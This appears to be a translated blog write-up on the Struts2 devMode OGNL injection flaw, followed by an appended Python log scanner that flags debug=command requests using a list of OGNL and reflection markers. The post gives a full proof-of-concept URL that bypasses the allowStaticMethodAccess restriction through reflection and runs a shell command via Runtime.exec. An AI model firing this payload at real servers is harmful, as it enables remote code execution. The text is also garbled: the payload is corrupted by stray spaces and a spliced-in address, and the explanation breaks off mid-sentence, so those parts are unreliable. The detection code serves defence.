I have read many articles online on exploiting Struts2, but few of them trace how the vulnerability is actually triggered, and nobody else seems to have followed it through. Struts has recently had two much-discussed vulnerabilities, so I did some research to get a stable, usable payload.
The Struts2 framework has a devMode that makes it easier for developers to debug a program. It is disabled by default; to use it you have to enable it manually, either by setting devMode to true in struts.properties or by adding the following to struts.xml:
<constant name="struts.devMode" value="true" />
devMode is actually implemented by DebuggingInterceptor.java, deep inside struts2-core.jar, and that is where the vulnerability lives. I tested the debug=command branch of that logic; my PoC is the following:
http://localhost:8 0 8 0/S2-0 1 6/hello. action? debug=command&expression= %23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccessemail@example.com.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java. io. InputStreamReader%2 8%23a%2 9%2c%23c%3dnew java. io. BufferedReader%2 8%23b%2 9%2c%23d%3dnew char%5b50000%5d%2c%23c. read%2 8%23d%2 9%2c%23genxor%3d%23context. get%2 8%22com. opensymphony. xwork2. dispatcher. HttpServletResponse%2 2% 2 9. getWriter%2 8% 2 9%2c%23genxor. println%2 8%23d%2 9%2c%23genxor. flush%2 8% 2 9%2c%23genxor. close%2 8% 2 9
First, devMode provides several debug modes (shown in a figure in the original post).
Continuing into the DebuggingInterceptor.java code, the problem is in the following logic.
(Parameter tracing is shown in a figure in the original post.)
Here you can see:
String cmd = getParameter(EXPRESSION_PARAM); ... writer.print(stack.findValue(cmd));
cmd is passed straight to findValue without any processing. findValue evaluates OGNL expressions (see the official documentation for details), so the OGNL expression in the parameter gets executed.
There is not much to say about exploiting this; the key point is that the payload uses Java reflection (which can reach private member variables) to bypass the rule by which Struts2 restricts execution of static Java methods, so the earlier official Apache fix is rendered useless. Since Struts2 2.3.14.1, #_memberAccess["allowStaticMethodAccess"] can no longer be modified, yet calling a static Java method requires allowStaticMethodAccess to be true. Here the use of
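As an added detection example, not part of the original post: a small scanner over constructed access-log lines (the log format is an assumption) that flags any request carrying the devMode debug parameter and, for debug=command, checks the expression parameter for the OGNL and reflection idioms this payload relies on.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# OGNL idioms the PoC relies on (static-method call syntax and the reflection
# used to flip allowStaticMethodAccess); matched case-insensitively.
OGNL_MARKERS = ("#_memberaccess", "allowstaticmethodaccess", "denymethodexecution",
                "getdeclaredfield", "setaccessible", "@java.lang.", "getruntime")
# Constructed log format (an assumption, not a real server format):
# "<client-ip> <method> <url-with-query> <status>"
LOG_RE = re.compile(r"^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3})$")

def classify_request(url):
    """Return (severity, reasons) with severity 'none', 'devmode-probe' or
    'ognl-injection'. Any debug= parameter reaching a production app is worth a
    look; debug=command plus expression= is the DebuggingInterceptor path that
    hands attacker input straight to findValue."""
    params = {k.lower(): v for k, v in
              parse_qs(urlsplit(url).query, keep_blank_values=True).items()}
    if "debug" not in params:
        return "none", []
    mode = params["debug"][0].lower()
    reasons = ["debug=" + mode]
    if mode != "command" or "expression" not in params:
        return "devmode-probe", reasons
    # parse_qs already decoded once; a second unquote catches double encoding.
    expr = unquote(params["expression"][0]).lower()
    hits = [m for m in OGNL_MARKERS if m in expr]
    return ("ognl-injection", reasons + hits) if hits else ("devmode-probe", reasons)

def scan_log(lines):
    """Yield (client, url, severity, reasons) for every flagged log line."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            severity, reasons = classify_request(m["url"])
            if severity != "none":
                yield m["client"], m["url"], severity, reasons

# Constructed sample lines, not real traffic; the third carries only the
# allowStaticMethodAccess assignment, not the full PoC.
SAMPLE_LOG = [
    "10.0.0.5 GET /S2-016/hello.action?name=alice 200",
    "10.0.0.6 GET /S2-016/hello.action?debug=browser 200",
    "10.0.0.7 GET /S2-016/hello.action?debug=command&expression="
    "%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue 200",
]
if __name__ == "__main__":
    for client, url, severity, reasons in scan_log(SAMPLE_LOG):
        print(severity, client, url, ", ".join(reasons))
```

On a hardened deployment devMode should be off, so any devmode-probe hit is itself a misconfiguration signal worth alerting on.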